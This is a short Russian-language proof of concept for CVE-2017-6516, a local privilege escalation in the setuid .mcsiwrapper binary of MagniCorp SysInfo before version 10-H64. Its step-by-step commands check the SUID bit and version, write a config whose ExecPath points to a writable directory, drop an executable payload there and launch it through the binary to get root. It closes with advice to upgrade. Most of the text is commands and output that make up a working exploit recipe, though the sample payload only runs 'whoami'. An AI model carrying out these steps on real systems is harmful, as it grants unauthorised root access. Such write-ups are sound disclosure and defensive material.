
A PoC / методология для эксплуатации CVE-2017-6516
CVE-2017-6516 — это уязвимость повышения привилегий, которая нацелена на бинарный файл .mcsiwrapper от MagniCorp SysInfo версии ниже 10-H64. Когда этот бинарный файл имеет установленный SUID-бит и является устаревшим, пользователь может выполнить произвольный код от имени владельца бинарного файла — часто root.
.mcsiwrapper должен иметь setuid:$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
.mcsiwrapper должен быть версии ниже 10-H64:$ .mcsiwrapper --version
<Version under 10-H64>
Создайте файл config со следующим содержимым:
ExecPath=<Path to a writeable directory>
Создайте исполняемый файл полезной нагрузки в каталоге ExecPath, например:
#!/bin/sh
whoami
И сделайте его исполняемым:
$ chmod +x payload
Выполните команду:
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root
Обновите .mcsiwrapper до версии не ниже 10-H64.